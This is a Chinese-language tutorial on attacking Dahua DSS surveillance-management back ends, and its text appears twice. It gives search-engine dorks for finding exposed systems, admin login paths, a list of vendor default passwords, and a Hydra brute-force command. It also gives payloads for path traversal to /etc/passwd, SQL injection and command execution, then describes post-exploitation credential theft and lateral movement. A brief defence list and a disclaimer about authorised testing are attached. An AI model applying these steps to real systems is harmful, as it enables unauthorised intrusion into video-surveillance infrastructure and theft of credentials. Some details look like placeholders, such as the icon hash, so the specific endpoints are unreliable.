大华dss后台系统渗透
字数 1161 2025-08-10 00:24:04

大华DSS后台系统渗透实战教学文档

0x01 资产发现与信息收集

1.1 目标识别

  • 使用网络空间搜索引擎(如FOFA、Shodan、ZoomEye)搜索大华DSS系统
  • 常用搜索语法:
    • title="DSS"
    • body="DSS" && body="login"
    • icon_hash="-123456789" (大华特有图标哈希)

1.2 目录扫描

推荐工具:

  • Dirsearch
  • Gobuster
  • Burp Suite Intruder

常见DSS后台路径:

/webapi/index.html
/portal/views/login/login.html
/dss/index.html
/manager/login.html

0x02 弱口令爆破实战

2.1 确定爆破目标

  • 目标URL:http://[target]/manager/login.html
  • 请求方式:POST
  • 参数格式:username=admin&password=123456

2.2 常用字典准备

大华默认凭证:

admin/admin
admin/123456
admin/Admin123
admin/Dahua123
admin/dahua123456
admin/888888
admin/666666

2.3 爆破工具配置

使用Burp Suite Intruder:

  1. 捕获登录请求
  2. 设置攻击类型为"Pitchfork"
  3. 标记username和password参数
  4. 加载字典文件

Hydra命令行示例:

hydra -l admin -P passlist.txt [target] http-post-form "/manager/login.html:username=^USER^&password=^PASS^:F=login failed"

0x03 漏洞利用

3.1 已知漏洞利用

  1. 任意文件读取漏洞

    • 路径:/portal/services/carQuery/getCarList.action
    • 参数:fileName=../../../../etc/passwd
  2. SQL注入漏洞

    • 路径:/portal/services/clientServer/getUserMenus.action
    • 参数:userId=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))--
  3. 命令执行漏洞

    • 路径:/portal/services/clientServer/execClientScript.action
    • 参数:script=whoami

3.2 后渗透操作

  1. 获取数据库凭证

    • 查找配置文件路径:/portal/conf/db.xml
    • 解密数据库密码(大华常用Base64或简单加密)
  2. 横向移动

    • 通过数据库查找其他系统账号
    • 尝试使用相同凭证登录其他系统

0x04 防御措施

4.1 管理员建议

  1. 修改默认凭证
  2. 限制后台访问IP
  3. 及时更新补丁
  4. 启用多因素认证

4.2 安全配置

  1. 修改默认路径
  2. 禁用不必要的服务
  3. 配置WAF规则
  4. 启用登录失败锁定机制

附录:常用工具和资源

工具列表

  1. Burp Suite Professional
  2. SQLmap
  3. Metasploit Framework
  4. Nmap

参考链接

  • 大华安全公告中心
  • CVE数据库大华相关漏洞
  • 奇安信漏洞库

本教学文档仅用于合法授权测试和安全研究,未经授权对他人系统进行渗透测试属于违法行为。

大华DSS后台系统渗透实战教学文档 0x01 资产发现与信息收集 1.1 目标识别 使用网络空间搜索引擎(如FOFA、Shodan、ZoomEye)搜索大华DSS系统 常用搜索语法: title="DSS" body="DSS" && body="login" icon_hash="-123456789" (大华特有图标哈希) 1.2 目录扫描 推荐工具: Dirsearch Gobuster Burp Suite Intruder 常见DSS后台路径: 0x02 弱口令爆破实战 2.1 确定爆破目标 目标URL: http://[target]/manager/login.html 请求方式:POST 参数格式: username=admin&password=123456 2.2 常用字典准备 大华默认凭证: 2.3 爆破工具配置 使用Burp Suite Intruder: 捕获登录请求 设置攻击类型为"Pitchfork" 标记username和password参数 加载字典文件 Hydra命令行示例: 0x03 漏洞利用 3.1 已知漏洞利用 任意文件读取漏洞 路径: /portal/services/carQuery/getCarList.action 参数: fileName=../../../../etc/passwd SQL注入漏洞 路径: /portal/services/clientServer/getUserMenus.action 参数: userId=1' AND 1=CONVERT(int,(SELECT table_name FROM information_schema.tables))-- 命令执行漏洞 路径: /portal/services/clientServer/execClientScript.action 参数: script=whoami 3.2 后渗透操作 获取数据库凭证 查找配置文件路径: /portal/conf/db.xml 解密数据库密码(大华常用Base64或简单加密) 横向移动 通过数据库查找其他系统账号 尝试使用相同凭证登录其他系统 0x04 防御措施 4.1 管理员建议 修改默认凭证 限制后台访问IP 及时更新补丁 启用多因素认证 4.2 安全配置 修改默认路径 禁用不必要的服务 配置WAF规则 启用登录失败锁定机制 附录:常用工具和资源 工具列表 Burp Suite Professional SQLmap Metasploit Framework Nmap 参考链接 大华安全公告中心 CVE数据库大华相关漏洞 奇安信漏洞库 本教学文档仅用于合法授权测试和安全研究,未经授权对他人系统进行渗透测试属于违法行为。